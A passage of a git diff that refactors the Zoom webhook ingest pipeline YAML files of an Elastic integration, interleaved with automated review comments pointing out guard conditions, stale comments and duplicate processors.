a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_message.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_message.yml 
@@ -7,46 +7,46 @@ processors: - append: field: event.type value: creation - if: ctx?.event?.action == 'chat_message.sent' + if: ctx.event?.action == 'chat_message.sent' - append: field: event.type value: deletion - if: ctx?.event?.action == 'chat_message.deleted' + if: ctx.event?.action == 'chat_message.deleted' - append: field: event.type value: change - if: ctx?.event?.action == 'chat_message.updated' + if: ctx.event?.action == 'chat_message.updated' - rename: field: zoom.object target_field: zoom.chat_message ignore_missing: true - append: field: related.user - value: "{{zoom.chat_message.contact_id}}" - if: "ctx?.zoom?.chat_message?.contact_id != null" + value: "{{{zoom.chat_message.contact_id}}}" + if: ctx.zoom?.chat_message?.contact_id != null - date: field: zoom.chat_message.timestamp target_field: '@timestamp' formats: - UNIX_MS - if: ctx?.zoom?.chat_message?.timestamp != null + if: ctx.zoom?.chat_message?.timestamp != null ignore_failure: true - remove: field: zoom.chat_message.date_time ignore_missing: true - if: ctx?.zoom?.chat_message?.timestamp != null + if: ctx.zoom?.chat_message?.timestamp != null - date: field: zoom.chat_message.date_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.zoom?.chat_message?.timestamp == null + if: ctx.zoom?.chat_message?.timestamp == null ignore_failure: true - remove: field: zoom.chat_message.timestamp ignore_missing: true - remove: - if: ctx?.zoom?.chat_message?.message == null + if: ctx.zoom?.chat_message?.message == null field: zoom.chat_message.message ignore_missing: true on_failure: diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/default.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/default.yml index 4308e61ba56..6def48a876c 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/default.yml 
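Review bot: The rewritten condition on the `zoom.chat_message.date_time` date processor is still only `ctx.zoom?.chat_message?.timestamp == null`, so when both fields are absent the processor runs on a missing field and relies on `ignore_failure: true` to swallow the error; the sibling chat_channel pipeline in this commit guards the same processor with both checks. For consistency use `if: ctx.zoom?.chat_message?.date_time != null && ctx.zoom?.chat_message?.timestamp == null`, which also keeps `ignore_failure` reserved for genuinely malformed values rather than routine absence.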
@@ -60,19 +60,19 @@ processors: ignore_missing: true - append: field: related.user - value: "{{zoom.operator_id}}" - if: "ctx.zoom?.operator_id != null" + value: "{{{zoom.operator_id}}}" + if: ctx.zoom?.operator_id != null # Set user.id from operator data (user who performs an action). - set: field: user.id - value: "{{zoom.operator_id}}" - if: "ctx.zoom?.operator_id != null" + value: "{{{zoom.operator_id}}}" + if: ctx.zoom?.operator_id != null # Set user.name from operator data only when user.id also set above. - set: field: user.email - value: "{{zoom.operator}}" + value: "{{{zoom.operator}}}" ignore_empty_value: true - if: "ctx.zoom?.operator_id != null" + if: ctx.zoom?.operator_id != null # Removing some fields that have complex nested arrays that might impact performance - remove: field: 
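Review bot: The comment directly above the `user.email` set in this hunk still reads `# Set user.name from operator data only when user.id also set above.`, while the processor it introduces writes `user.email` from `{{{zoom.operator}}}`. Since the commit already rewrites the `value` and `if` lines of that processor, the comment should follow: `# Set user.email from zoom.operator, under the same operator_id condition as user.id above.`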
@@ -94,31 +94,31 @@ processors: ignore_missing: true - pipeline: name: '{{ IngestPipeline "meeting" }}' - if: "ctx?.event?.action.startsWith('meeting')" + if: ctx.event?.action?.startsWith('meeting') == true - pipeline: name: '{{ IngestPipeline "account" }}' - if: "ctx?.event?.action.startsWith('account')" + if: ctx.event?.action?.startsWith('account') == true - pipeline: name: '{{ IngestPipeline "chat_message" }}' - if: "ctx?.event?.action.startsWith('chat_message')" + if: ctx.event?.action?.startsWith('chat_message') == true - pipeline: name: '{{ IngestPipeline "chat_channel" }}' - if: "ctx?.event?.action.startsWith('chat_channel')" + if: ctx.event?.action?.startsWith('chat_channel') == true - pipeline: name: '{{ IngestPipeline "phone" }}' - if: "ctx?.event?.action.startsWith('phone')" + if: ctx.event?.action?.startsWith('phone') == true - pipeline: name: '{{ IngestPipeline "recording" }}' - if: "ctx?.event?.action.startsWith('recording')" + if: ctx.event?.action?.startsWith('recording') == true - pipeline: name: '{{ IngestPipeline "user" }}' - if: "ctx?.event?.action.startsWith('user')" + if: ctx.event?.action?.startsWith('user') == true - pipeline: name: '{{ IngestPipeline "webinar" }}' - if: "ctx?.event?.action.startsWith('webinar')" + if: ctx.event?.action?.startsWith('webinar') == true - pipeline: name: '{{ IngestPipeline "zoomroom" }}' - if: "ctx?.event?.action.startsWith('zoomroom')" + if: ctx.event?.action?.startsWith('zoomroom') == true on_failure: - set: field: event.kind diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/meeting.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/meeting.yml index 7bc3ebe65b6..ebc2cee87a9 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/meeting.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/meeting.yml 
@@ -4,35 +4,35 @@ processors: - append: field: event.type value: info - if: ctx?.event?.action != 'meeting.alert' + if: ctx.event?.action != 'meeting.alert' - append: field: event.type value: error - if: ctx?.event?.action == 'meeting.alert' + if: ctx.event?.action == 'meeting.alert' - append: field: event.type value: allowed - if: ctx?.event?.action == 'meeting.registration_approved' + if: ctx.event?.action == 'meeting.registration_approved' - append: field: event.type value: creation - if: "['meeting.registration_created', 'meeting.created'].contains(ctx?.event?.action)" + if: "['meeting.registration_created', 'meeting.created'].contains(ctx.event?.action)" - append: field: event.type value: deletion - if: ctx?.event?.action == 'meeting.deleted' + if: ctx.event?.action == 'meeting.deleted' - append: field: event.type value: change - if: ctx?.event?.action == 'meeting.updated' + if: ctx.event?.action == 'meeting.updated' - append: field: event.type value: start - if: "['meeting.started', 'meeting.sharing_started'].contains(ctx?.event?.action)" + if: "['meeting.started', 'meeting.sharing_started'].contains(ctx.event?.action)" - append: field: event.type value: end - if: "['meeting.ended', 'meeting.sharing_ended'].contains(ctx?.event?.action)" + if: "['meeting.ended', 'meeting.sharing_ended'].contains(ctx.event?.action)" - rename: field: zoom.object target_field: zoom.meeting @@ -45,7 +45,7 @@ processors: field: zoom.registrant.join_url target_field: url.full ignore_missing: true - if: ctx?.url?.full == null + if: ctx.url?.full == null # # Set user.* from participant, if any. 
@@ -54,14 +54,14 @@ processors: field: - user ignore_missing: true - if: 'ctx.zoom?.participant != null' + if: ctx.zoom?.participant != null - set: field: user.id - value: '{{zoom.participant.id}}' + value: '{{{zoom.participant.id}}}' ignore_empty_value: true - set: field: user.full_name - value: '{{zoom.participant.user_name}}' + value: '{{{zoom.participant.user_name}}}' ignore_empty_value: true # @@ -69,7 +69,7 @@ processors: # - set: field: user.id - value: '{{zoom.meeting.host_id}}' + value: '{{{zoom.meeting.host_id}}}' ignore_empty_value: true override: false 
@@ -78,90 +78,100 @@ processors: # - append: field: related.user - value: "{{zoom.participant.id}}" + value: "{{{zoom.participant.id}}}" allow_duplicates: false - if: 'ctx.zoom?.participant?.id != null' + if: ctx.zoom?.participant?.id != null - append: field: related.user - value: "{{zoom.meeting.host_id}}" + value: "{{{zoom.meeting.host_id}}}" allow_duplicates: false - if: 'ctx.zoom?.meeting?.host_id != null' + if: ctx.zoom?.meeting?.host_id != null - date: field: zoom.meeting.start_time target_field: event.start formats: - ISO_INSTANT - if: ctx?.event?.action == 'meeting.started' + if: ctx.event?.action == 'meeting.started' ignore_failure: true - date: field: zoom.participant.sharing_details.date_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'meeting.sharing_started' + if: ctx.event?.action == 'meeting.sharing_started' ignore_failure: true - date: field: zoom.participant.date_time target_field: '@timestamp' formats: - ISO_INSTANT - if: "['meeting.participant_put_in_waiting_room', 'meeting.participant_joined_waiting_room', 'meeting.participant_left_waiting_room'].contains(ctx?.event?.action)" + if: >- + [ + 'meeting.participant_put_in_waiting_room', + 'meeting.participant_joined_waiting_room', + 'meeting.participant_left_waiting_room' + ].contains(ctx.event?.action) ignore_failure: true - date: field: zoom.participant.join_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'meeting.participant_joined' + if: ctx.event?.action == 'meeting.participant_joined' ignore_failure: true - date: field: zoom.participant.leave_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'meeting.participant_left' + if: ctx.event?.action == 'meeting.participant_left' ignore_failure: true - date: field: zoom.time_stamp target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'meeting.updated' + if: ctx.event?.action == 'meeting.updated' ignore_failure: true - script: 
lang: painless - if: ctx?.zoom?.meeting?.duration != null + if: ctx.zoom?.meeting?.duration != null source: >- ctx.event.duration = ctx.zoom.meeting.duration * 60L * 1000000000L; - remove: field: zoom.meeting.start_time ignore_missing: true - if: ctx?.event?.action == 'meeting.started' + if: ctx.event?.action == 'meeting.started' - remove: field: zoom.meeting.duration ignore_missing: true - if: ctx?.event?.duration != null + if: ctx.event?.duration != null - remove: field: zoom.participant.sharing_details.date_time ignore_missing: true - if: ctx?.event?.action == 'meeting.sharing_started' + if: ctx.event?.action == 'meeting.sharing_started' - remove: field: zoom.participant.date_time ignore_missing: true - if: "['meeting.participant_put_in_waiting_room', 'meeting.participant_joined_waiting_room', 'meeting.participant_left_waiting_room'].contains(ctx?.event?.action)" + if: >- + [ + 'meeting.participant_put_in_waiting_room', + 'meeting.participant_joined_waiting_room', + 'meeting.participant_left_waiting_room' + ].contains(ctx.event?.action) - remove: field: zoom.participant.join_time ignore_missing: true - if: ctx?.event?.action == 'meeting.participant_joined' + if: ctx.event?.action == 'meeting.participant_joined' - remove: field: zoom.participant.leave_time ignore_missing: true - if: ctx?.event?.action == 'meeting.participant_left' + if: ctx.event?.action == 'meeting.participant_left' - remove: field: zoom.time_stamp ignore_missing: true - if: ctx?.event?.action == 'meeting.updated' + if: ctx.event?.action == 'meeting.updated' on_failure: - set: field: event.kind diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/phone.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/phone.yml index e1b8e662591..90aa2b6b29c 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/phone.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/phone.yml 
@@ -7,15 +7,15 @@ processors: - append: field: event.type value: creation - if: "['phone.caller_ringing', 'phone.callee_ringing'].contains(ctx?.event?.action)" + if: "['phone.caller_ringing', 'phone.callee_ringing'].contains(ctx.event?.action)" - append: field: event.type value: start - if: "['phone.callee_answered', 'phone.caller_connected'].contains(ctx?.event?.action)" + if: "['phone.callee_answered', 'phone.caller_connected'].contains(ctx.event?.action)" - append: field: event.type value: end - if: "['phone.callee_missed', 'phone.callee_ended', 'phone.caller_ended'].contains(ctx?.event?.action)" + if: "['phone.callee_missed', 'phone.callee_ended', 'phone.caller_ended'].contains(ctx.event?.action)" - rename: field: zoom.object target_field: zoom.phone 
@@ -29,35 +29,41 @@ processors: target_field: '@timestamp' formats: - ISO_INSTANT - if: "['phone.callee_ringing', 'phone.caller_ringing', 'phone.caller_ended'].contains(ctx?.event?.action)" + if: "['phone.callee_ringing', 'phone.caller_ringing', 'phone.caller_ended'].contains(ctx.event?.action)" ignore_failure: true - date: field: zoom.phone.connected_start_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'phone.caller_connected' + if: ctx.event?.action == 'phone.caller_connected' ignore_failure: true - date: field: zoom.phone.answer_start_time target_field: '@timestamp' formats: - ISO_INSTANT - if: "ctx?.zoom?.phone.answer_start_time != null && ctx?.event?.action == 'phone.callee_answered'" + if: ctx.zoom?.phone?.answer_start_time != null && ctx.event?.action == 'phone.callee_answered' ignore_failure: true - date: field: zoom.phone.call_end_time target_field: '@timestamp' formats: - ISO_INSTANT - if: "['phone.callee_missed', 'phone.callee_ended', 'phone.caller_ended', 'phone.callee_rejected'].contains(ctx?.event?.action)" + if: >- + [ + 'phone.callee_missed', + 'phone.callee_ended', + 'phone.caller_ended', + 'phone.callee_rejected' + ].contains(ctx.event?.action) ignore_failure: true - date: field: zoom.phone.date_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'phone.voicemail_received' + if: ctx.event?.action == 'phone.voicemail_received' ignore_failure: true - convert: field: zoom.phone.duration 
@@ -66,7 +72,7 @@ processors: # Calculates duration when duration is unknown but start and end time is known (with ringing_start_time) - script: lang: painless - if: "ctx?.zoom?.phone?.ringing_start_time != null && ctx?.zoom?.phone?.answer_start_time == null && ctx?.zoom?.phone?.call_end_time != null && ctx?.zoom?.phone?.duration == null" + if: ctx.zoom?.phone?.ringing_start_time != null && ctx.zoom?.phone?.answer_start_time == null && ctx.zoom?.phone?.call_end_time != null && ctx.zoom?.phone?.duration == null source: >- ctx.event.start = ctx.zoom.phone.ringing_start_time; ctx.event.end = ctx.zoom.phone.call_end_time; @@ -77,7 +83,7 @@ processors: # Calculates duration when duration is unknown but start and end time is known (with answer_start_time) - script: lang: painless - if: "ctx?.zoom?.phone?.ringing_start_time == null && ctx?.zoom?.phone?.answer_start_time != null && ctx?.zoom?.phone?.call_end_time != null && ctx?.zoom?.phone?.duration == null" + if: ctx.zoom?.phone?.ringing_start_time == null && ctx.zoom?.phone?.answer_start_time != null && ctx.zoom?.phone?.call_end_time != null && ctx.zoom?.phone?.duration == null source: >- ctx.event.start = ctx.zoom.phone.answer_start_time; ctx.event.end = ctx.zoom.phone.call_end_time; @@ -88,7 +94,7 @@ processors: # Duration is in minutes, so multiply by seconds and then multiply again to convert seconds to nano - script: lang: painless - if: ctx?.zoom?.duration != null + if: ctx.zoom?.duration != null source: >- ctx.event.duration = ctx.zoom.phone.duration * 60L * 1000000000L; 
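Review bot: In the third hunk the script guard `if: ctx.zoom?.duration != null` tests `zoom.duration`, but the script body reads `ctx.zoom.phone.duration`, which is also the field the `convert` processor just before these hunks operates on; meeting.yml guards the equivalent script with `ctx.zoom?.meeting?.duration != null`. As written the guard appears never to match, so `event.duration` is not computed for phone events, and if a top-level `zoom.duration` ever did appear without `zoom.phone.duration` the multiplication would fail on a null. The commit only drops the `?` after `ctx` on this line; change it to `if: ctx.zoom?.phone?.duration != null` while here.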
@@ -144,30 +150,30 @@ processors: ignore_missing: true - append: field: related.user - value: "{{zoom.phone.callee.user_id}}" + value: "{{{zoom.phone.callee.user_id}}}" allow_duplicates: false - if: ctx?.zoom?.phone?.callee?.user_id != null + if: ctx.zoom?.phone?.callee?.user_id != null - append: field: related.user - value: "{{zoom.phone.callee_user_id}}" + value: "{{{zoom.phone.callee_user_id}}}" allow_duplicates: false - if: ctx?.zoom?.phone?.callee_user_id != null + if: ctx.zoom?.phone?.callee_user_id != null - append: field: related.user - value: "{{zoom.phone.caller.user_id}}" + value: "{{{zoom.phone.caller.user_id}}}" allow_duplicates: false - if: ctx?.zoom?.phone?.caller?.user_id != null + if: ctx.zoom?.phone?.caller?.user_id != null - remove: field: zoom.phone.date_time ignore_missing: true - if: ctx?.event?.action == 'phone.voicemail_received' + if: ctx.event?.action == 'phone.voicemail_received' - set: field: source.user.id - value: '{{zoom.phone.caller.user_id}}' + value: '{{{zoom.phone.caller.user_id}}}' ignore_empty_value: true - set: field: destination.user.id - value: '{{zoom.phone.callee.user_id}}' + value: '{{{zoom.phone.callee.user_id}}}' ignore_empty_value: true on_failure: - set: diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/recording.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/recording.yml index 2471ba46823..14c881b8e88 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/recording.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/recording.yml 
@@ -7,31 +7,31 @@ processors: - append: field: event.type value: creation - if: ctx?.event?.action == 'recording.registration_created' + if: ctx.event?.action == 'recording.registration_created' - append: field: event.type value: allowed - if: ctx?.event?.action == 'recording.registration_approved' + if: ctx.event?.action == 'recording.registration_approved' - append: field: event.type value: denied - if: ctx?.event?.action == 'recording.registration_denied' + if: ctx.event?.action == 'recording.registration_denied' - append: field: event.type value: deletion - if: "['recording.deleted', 'recording.trashed'].contains(ctx?.event?.action)" + if: "['recording.deleted', 'recording.trashed'].contains(ctx.event?.action)" - append: field: event.type value: change - if: "['recording.paused', 'recording.resumed', 'recording.renamed', 'recording.recovered'].contains(ctx?.event?.action)" + if: "['recording.paused', 'recording.resumed', 'recording.renamed', 'recording.recovered'].contains(ctx.event?.action)" - append: field: event.type value: start - if: ctx?.event?.action == 'recording.started' + if: ctx.event?.action == 'recording.started' - append: field: event.type value: end - if: "['recording.stopped', 'recording.completed', 'recording.transcript_completed'].contains(ctx?.event?.action)" + if: "['recording.stopped', 'recording.completed', 'recording.transcript_completed'].contains(ctx.event?.action)" - rename: field: zoom.object target_field: zoom.recording 
@@ -45,27 +45,27 @@ processors: target_field: '@timestamp' formats: - UNIX_MS - if: ctx?.event?.action == 'recording.renamed' + if: ctx.event?.action == 'recording.renamed' ignore_failure: true - remove: field: zoom.recording.recording_file.recording_start - if: 'ctx.zoom?.recording?.recording_file?.recording_start == ""' + if: ctx.zoom?.recording?.recording_file?.recording_start == "" - remove: field: zoom.recording.recording_file.recording_end - if: 'ctx.zoom?.recording?.recording_file?.recording_end == ""' + if: ctx.zoom?.recording?.recording_file?.recording_end == "" - set: field: event.start - value: '{{ zoom.recording.recording_file.recording_start }}' + value: '{{{ zoom.recording.recording_file.recording_start }}}' ignore_empty_value: true - if: ctx?.event?.action == 'recording.started' + if: ctx.event?.action == 'recording.started' - set: field: event.end - value: '{{ zoom.recording.recording_file.recording_end }}' + value: '{{{ zoom.recording.recording_file.recording_end }}}' ignore_empty_value: true - if: ctx?.event?.action == 'recording.stopped' + if: ctx.event?.action == 'recording.stopped' - script: lang: painless - if: "ctx?.event?.end != null && ctx?.event?.start != null && ctx?.event?.action == 'recording.stopped'" + if: ctx.event?.end != null && ctx.event?.start != null && ctx.event?.action == 'recording.stopped' source: >- ZonedDateTime start = ZonedDateTime.parse(ctx.event.start); ZonedDateTime end = ZonedDateTime.parse(ctx.event.end); 
@@ -75,40 +75,40 @@ processors: target_field: '@timestamp' formats: - ISO_INSTANT - if: "ctx?.zoom?.recording?.recording_file?.recording_start != null && ctx?.event?.action == 'recording.started'" + if: ctx.zoom?.recording?.recording_file?.recording_start != null && ctx.event?.action == 'recording.started' ignore_failure: true - append: field: related.user - value: "{{zoom.recording.host_id}}" - if: "ctx?.zoom?.recording?.host_id != null" + value: "{{{zoom.recording.host_id}}}" + if: ctx.zoom?.recording?.host_id != null - append: field: related.user - value: "{{zoom.registrant.id}}" - if: "ctx?.zoom?.registrant?.id != null" + value: "{{{zoom.registrant.id}}}" + if: ctx.zoom?.registrant?.id != null - remove: field: zoom.time_stamp ignore_missing: true - if: ctx?.event?.action == 'recording.renamed' + if: ctx.event?.action == 'recording.renamed' - set: field: 'user.email' - value: '{{zoom.registrant.email}}' + value: '{{{zoom.registrant.email}}}' ignore_empty_value: true - if: 'ctx.user?.id == null && ctx.zoom?.registrant != null' + if: ctx.user?.id == null && ctx.zoom?.registrant != null - set: field: 'user.full_name' value: '{{zoom.registrant.first_name}} {{zoom.registrant.last_name}}' ignore_empty_value: true - if: 'ctx.user?.id == null && ctx.zoom?.registrant != null' + if: ctx.user?.id == null && ctx.zoom?.registrant != null - set: field: 'user.id' - value: '{{zoom.registrant.id}}' + value: '{{{zoom.registrant.id}}}' ignore_empty_value: true - if: 'ctx.user?.id == null && ctx.zoom?.registrant != null' + if: ctx.user?.id == null && ctx.zoom?.registrant != null - set: field: 'user.id' - value: '{{zoom.recording.host_id}}' + value: '{{{zoom.recording.host_id}}}' ignore_empty_value: true - if: 'ctx.zoom?.registrant == null' + if: ctx.zoom?.registrant == null on_failure: - set: field: event.kind 
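Review bot: The `user.full_name` set in this hunk keeps `value: '{{zoom.registrant.first_name}} {{zoom.registrant.last_name}}'` in double mustache while every other value in the file is moved to `{{{…}}}`; double mustache HTML-escapes, so a name such as O'Brien is indexed with `&#39;` while the adjacent ids and emails are not escaped. The same mixed form remains in user.yml (`user.full_name`, `user.target.full_name`, `user.changes.full_name`) and in webinar.yml (`user.full_name` from `zoom.registrant`). Either convert these too, `value: '{{{zoom.registrant.first_name}}} {{{zoom.registrant.last_name}}}'`, or add a comment explaining why names are deliberately left escaped.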
diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/user.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/user.yml index a249c2c53ca..80de6fab4dd 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/user.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/user.yml @@ -4,35 +4,44 @@ processors: - append: field: event.category value: configuration - if: "['user.settings_updated'].contains(ctx?.event?.action)" + if: ctx.event?.action == 'user.settings_updated' - append: field: event.category value: iam - if: "!['user.signed_in', 'user.signed_out'].contains(ctx?.event?.action)" + if: "!['user.signed_in', 'user.signed_out'].contains(ctx.event?.action)" - append: field: event.category value: authentication - if: "['user.signed_in', 'user.signed_out'].contains(ctx?.event?.action)" + if: "['user.signed_in', 'user.signed_out'].contains(ctx.event?.action)" - append: field: event.type value: creation - if: ctx?.event?.action == 'user.created' + if: ctx.event?.action == 'user.created' - append: field: event.type value: deletion - if: ctx?.event?.action == 'user.deleted' + if: ctx.event?.action == 'user.deleted' - append: field: event.type value: change - if: "['user.updated', 'user.settings_updated', 'user.deactivated', 'user.activated', 'user.disassociated', 'user.presence_status_updated', 'user.personal_notes_updated'].contains(ctx?.event?.action)" + if: >- + [ + 'user.updated', + 'user.settings_updated', + 'user.deactivated', + 'user.activated', + 'user.disassociated', + 'user.presence_status_updated', + 'user.personal_notes_updated' + ].contains(ctx.event?.action) - append: field: event.type value: start - if: ctx?.event?.action == 'user.signed_in' + if: ctx.event?.action == 'user.signed_in' - append: field: event.type value: end - if: ctx?.event?.action == 'user.signed_out' + if: ctx.event?.action == 'user.signed_out' - rename: field: zoom.object target_field: zoom.user 
@@ -42,19 +51,25 @@ processors: target_field: '@timestamp' formats: - UNIX_MS - if: "['user.updated', 'user.settings_updated'].contains(ctx?.event?.action)" + if: "['user.updated', 'user.settings_updated'].contains(ctx.event?.action)" ignore_failure: true - date: field: zoom.user.date_time target_field: '@timestamp' formats: - ISO_INSTANT - if: "['user.signed_in', 'user.signed_out', 'user.personal_notes_updated', 'user.presence_status_updated'].contains(ctx?.event?.action)" + if: >- + [ + 'user.signed_in', + 'user.signed_out', + 'user.personal_notes_updated', + 'user.presence_status_updated' + ].contains(ctx.event?.action) ignore_failure: true - append: field: related.user - value: "{{zoom.user.id}}" - if: "ctx?.zoom?.user?.id != null" + value: "{{{zoom.user.id}}}" + if: ctx.zoom?.user?.id != null - remove: field: - zoom.time_stamp @@ -66,11 +81,11 @@ processors: # - set: field: user.id - value: '{{zoom.operator_id}}' + value: '{{{zoom.operator_id}}}' ignore_empty_value: true - set: field: user.email - value: '{{zoom.operator}}' + value: '{{{zoom.operator}}}' ignore_empty_value: true # 
@@ -78,43 +93,43 @@ processors: # - set: field: user.id - value: '{{zoom.user.id}}' + value: '{{{zoom.user.id}}}' ignore_empty_value: true - if: 'ctx.zoom?.operator == null && ctx.zoom?.operator_id == null' + if: ctx.zoom?.operator == null && ctx.zoom?.operator_id == null - set: field: user.email - value: '{{zoom.user.email}}' + value: '{{{zoom.user.email}}}' ignore_empty_value: true - if: 'ctx.zoom?.operator == null && ctx.zoom?.operator_id == null' + if: ctx.zoom?.operator == null && ctx.zoom?.operator_id == null - set: field: user.full_name value: '{{zoom.user.first_name}} {{zoom.user.last_name}}' ignore_empty_value: true - if: 'ctx.zoom?.operator == null && ctx.zoom?.operator_id == null && ctx.zoom?.user?.first_name != null' + if: ctx.zoom?.operator == null && ctx.zoom?.operator_id == null && ctx.zoom?.user?.first_name != null # # set user.target.* from old_values # - set: field: user.target.id - value: '{{zoom.old_values.id}}' + value: '{{{zoom.old_values.id}}}' ignore_empty_value: true - set: field: user.target.id - value: '{{zoom.old_values.id}}' + value: '{{{zoom.old_values.id}}}' ignore_empty_value: true - set: field: user.target.email - value: '{{zoom.old_values.email}}' + value: '{{{zoom.old_values.email}}}' ignore_empty_value: true - set: field: user.target.email - value: '{{zoom.old_values.email}}' + value: '{{{zoom.old_values.email}}}' ignore_empty_value: true - set: field: user.target.full_name value: '{{zoom.old_values.first_name}} {{zoom.old_values.last_name}}' - if: 'ctx.zoom?.old_values?.first_name != null' + if: ctx.zoom?.old_values?.first_name != null # # set user.target.* from user.* without overriding old_values. 
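Review bot: This hunk leaves two verbatim copies of the `set` for `user.target.id` from `{{{zoom.old_values.id}}}` and two of the `set` for `user.target.email` from `{{{zoom.old_values.email}}}`; the second copy of each is a no-op and can be dropped. The next hunk has the same shape: `user.target.id` is set twice under an identical condition, and `user.target.email` is set with `override: false` first under `old_values != null || operator != null || operator_id != null` and then again under `old_values != null`, which the first condition already covers. Since the commit rewrites every one of these lines anyway, removing the duplicates here keeps the pipeline readable and avoids the redundant processor executions.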
@@ -122,28 +137,28 @@ processors: # - set: field: user.target.id - value: '{{zoom.user.id}}' + value: '{{{zoom.user.id}}}' ignore_empty_value: true override: false - if: 'ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null' + if: ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null - set: field: user.target.id - value: '{{zoom.user.id}}' + value: '{{{zoom.user.id}}}' ignore_empty_value: true override: false - if: 'ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null' + if: ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null - set: field: user.target.email - value: '{{zoom.user.email}}' + value: '{{{zoom.user.email}}}' ignore_empty_value: true override: false - if: 'ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null' + if: ctx.zoom?.old_values != null || ctx.zoom?.operator != null || ctx.zoom?.operator_id != null - set: field: user.target.email - value: '{{zoom.user.email}}' + value: '{{{zoom.user.email}}}' ignore_empty_value: true override: false - if: 'ctx.zoom?.old_values != null' + if: ctx.zoom?.old_values != null - set: field: user.target.full_name value: '{{zoom.user.first_name}} {{zoom.user.last_name}}' 
@@ -155,33 +170,33 @@ processors: # - set: field: user.changes.id - value: '{{zoom.user.id}}' + value: '{{{zoom.user.id}}}' ignore_empty_value: true - if: 'ctx.zoom?.old_values?.id != null && ctx.zoom?.old_values?.id != ctx.zoom?.user?.id' + if: ctx.zoom?.old_values?.id != null && ctx.zoom?.old_values?.id != ctx.zoom?.user?.id - set: field: user.changes.email - value: '{{zoom.user.email}}' + value: '{{{zoom.user.email}}}' ignore_empty_value: true - if: 'ctx.zoom?.old_values?.email != null && ctx.zoom?.old_values?.email != ctx.zoom?.user?.email' + if: ctx.zoom?.old_values?.email != null && ctx.zoom?.old_values?.email != ctx.zoom?.user?.email - set: field: user.changes.full_name value: '{{zoom.user.first_name}} {{zoom.user.last_name}}' ignore_empty_value: true - if: 'ctx.zoom?.old_values?.first_name != null && ctx.zoom?.old_values?.last_name != null && (ctx.zoom?.old_values?.last_name != ctx.zoom?.user?.last_name || ctx.zoom?.old_values?.first_name != ctx.zoom?.user?.first_name)' + if: ctx.zoom?.old_values?.first_name != null && ctx.zoom?.old_values?.last_name != null && (ctx.zoom?.old_values?.last_name != ctx.zoom?.user?.last_name || ctx.zoom?.old_values?.first_name != ctx.zoom?.user?.first_name) # # append to related.user # - append: field: related.user - value: "{{zoom.user.id}}" + value: "{{{zoom.user.id}}}" allow_duplicates: false - if: "ctx.zoom?.user?.id != null" + if: ctx.zoom?.user?.id != null - append: field: related.user - value: "{{zoom.old_values.id}}" + value: "{{{zoom.old_values.id}}}" allow_duplicates: false - if: "ctx.zoom?.old_values?.id != null" + if: ctx.zoom?.old_values?.id != null on_failure: - set: diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/webinar.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/webinar.yml index 6d9cff0ce4f..b3d4bd0724d 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/webinar.yml 
+++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/webinar.yml @@ -4,39 +4,45 @@ processors: - append: field: event.type value: info - if: ctx?.event?.action != 'webinar.alert' + if: ctx.event?.action != 'webinar.alert' - append: field: event.type value: error - if: ctx?.event?.action == 'webinar.alert' + if: ctx.event?.action == 'webinar.alert' - append: field: event.type value: creation - if: "['webinar.created', 'webinar.registration_created'].contains(ctx?.event?.action)" + if: "['webinar.created', 'webinar.registration_created'].contains(ctx.event?.action)" - append: field: event.type value: deletion - if: ctx?.event?.action == 'webinar.deleted' + if: ctx.event?.action == 'webinar.deleted' - append: field: event.type value: allowed - if: ctx?.event?.action == 'webinar.registration_approved' + if: ctx.event?.action == 'webinar.registration_approved' - append: field: event.type value: denied - if: ctx?.event?.action == 'webinar.registration_denied' + if: ctx.event?.action == 'webinar.registration_denied' - append: field: event.type value: change - if: "['webinar.updated', 'webinar.registration_approved', 'webinar.registration_denied', 'webinar.registration_cancelled'].contains(ctx?.event?.action)" + if: >- + [ + 'webinar.updated', + 'webinar.registration_approved', + 'webinar.registration_denied', + 'webinar.registration_cancelled' + ].contains(ctx.event?.action) - append: field: event.type value: start - if: "['webinar.started', 